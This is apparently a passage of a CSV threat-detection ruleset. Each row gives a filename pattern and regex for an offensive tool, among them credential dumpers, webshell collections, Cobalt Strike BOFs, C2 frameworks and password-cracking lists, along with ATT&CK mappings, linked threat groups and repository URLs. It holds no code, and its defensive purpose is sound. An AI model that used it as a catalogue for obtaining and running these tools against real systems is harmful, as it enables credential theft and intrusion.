"*/wcreddump.git*",".{0,1000}\/wcreddump\.git.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","1","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","12508" "*/wcreddump.py*",".{0,1000}\/wcreddump\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). 
Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","1","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","12509" "*/wdb-version.nse*",".{0,1000}\/wdb\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12510" "*/WDExclusion.dll*",".{0,1000}\/WDExclusion\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","12511" "*/wdextract.cpp*",".{0,1000}\/wdextract\.cpp.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","12512" "*/wdextract.cpp*",".{0,1000}\/wdextract\.cpp.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","12513" "*/WDExtract.git*",".{0,1000}\/WDExtract\.git.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","12514" "*/wdextract32.exe*",".{0,1000}\/wdextract32\.exe.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","12515" "*/wdextract64.exe*",".{0,1000}\/wdextract64\.exe.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","12516" "*/wdigest.py*",".{0,1000}\/wdigest\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12517" "*/WdToggle.c*",".{0,1000}\/WdToggle\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 
- T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","12518" "*/WdToggle.h*",".{0,1000}\/WdToggle\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","12519" "*/weakpass.git*",".{0,1000}\/weakpass\.git.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","12520" "*/weakpass_2a.gz*",".{0,1000}\/weakpass_2a\.gz.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","12521" 
"*/weakpass_3a.7z*",".{0,1000}\/weakpass_3a\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","12522" "*/Web/decouverte.txt*",".{0,1000}\/Web\/decouverte\.txt.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","N/A","3","280","45","2025-04-22T14:34:10Z","2020-10-21T14:37:53Z","12523" "*/Web/discovery.txt*",".{0,1000}\/Web\/discovery\.txt.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","N/A","3","280","45","2025-04-22T14:34:10Z","2020-10-21T14:37:53Z","12524" "*/web/pwn.html*",".{0,1000}\/web\/pwn\.html.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z","12525" "*/web_browser_password.html*",".{0,1000}\/web_browser_password\.html.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. 
as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12526" "*/web_delivery.py*",".{0,1000}\/web_delivery\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12527" "*/web_rce.py*",".{0,1000}\/web_rce\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","12528" "*/webauthn-inject.js*",".{0,1000}\/webauthn\-inject\.js.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","1","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","12529" "*/WebC2.cs*",".{0,1000}\/WebC2\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","#linux","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","12530" "*/webdav.py*",".{0,1000}\/webdav\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12531" "*/WebDavC2.git*",".{0,1000}\/WebDavC2\.git.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actual C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","N/A","10","10","119","37","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z","12532" "*/webdavshare/potato.local*",".{0,1000}\/webdavshare\/potato\.local.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication.
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","12533" "*/web-hacking-toolkit*",".{0,1000}\/web\-hacking\-toolkit.{0,1000}","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1210 - T1059 - T1105 - T1189 - T1071","TA0001 - TA0002 - TA0011 - TA0005","N/A","N/A","Exploitation tool","https://github.com/signedsecurity/web-hacking-toolkit","1","1","N/A","N/A","N/A","","N/A","","","","12534" "*/weblistener.py*",".{0,1000}\/weblistener\.py.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","12536" "*/WeblogicRCE.exe*",".{0,1000}\/WeblogicRCE\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","12537" 
"*/weblogic-t3-info.nse*",".{0,1000}\/weblogic\-t3\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12538" "*/webpassview.exe*",".{0,1000}\/webpassview\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","12539" "*/webshell.py*",".{0,1000}\/webshell\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","12540" "*/webshell/*.aspx*",".{0,1000}\/webshell\/.{0,1000}\.aspx.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","N/A","10","10","1397","205","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z","12541" "*/webshell/*.jsp*",".{0,1000}\/webshell\/.{0,1000}\.jsp.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","N/A","10","10","1397","205","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z","12542" "*/webshell/*.php*",".{0,1000}\/webshell\/.{0,1000}\.php.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","N/A","10","10","1397","205","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z","12543" "*/Webshell_Generate-1.1.jar*",".{0,1000}\/Webshell_Generate\-1\.1\.jar.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","12544" "*/webshell-123.php*",".{0,1000}\/webshell\-123\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","12545" "*/webshell-cnseay02-1.php*",".{0,1000}\/webshell\-cnseay02\-1\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","12546" "*/webshell-cnseay-x.php*",".{0,1000}\/webshell\-cnseay\-x\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","12547" "*/WebShellKillerTool.zip*",".{0,1000}\/WebShellKillerTool\.zip.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","12548" "*/webshells/shell.aspx*",".{0,1000}\/webshells\/shell\.aspx.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - 
T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","12549" "*/webshells/shell.php*",".{0,1000}\/webshells\/shell\.php.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","12550" "*/WebSocketC2.cs*",".{0,1000}\/WebSocketC2\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","12551" "*/webtrufflehog.git*",".{0,1000}\/webtrufflehog\.git.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","1","N/A","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","12552" "*/webtrufflehog.log*",".{0,1000}\/webtrufflehog\.log.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - 
TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","N/A","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","12553" "*/weevely.py*",".{0,1000}\/weevely\.py.{0,1000}","offensive_tool_keyword","Weevely3","Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime","T1059.003 - T1100 - T1071.001 - T1219 - T1078","TA0002 - TA0003 - TA0005 - TA0011 - TA0008","N/A","Sandworm","Resource Development","https://github.com/epinna/weevely3","1","1","N/A","N/A","8","10","3292","612","2024-10-18T04:32:13Z","2014-09-20T10:16:49Z","12557" "*/well_known_sids.py*",".{0,1000}\/well_known_sids\.py.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each other and how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passwords/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","N/A","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","12558" "*/WerTrigger.git*",".{0,1000}\/WerTrigger\.git.{0,1000}","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege 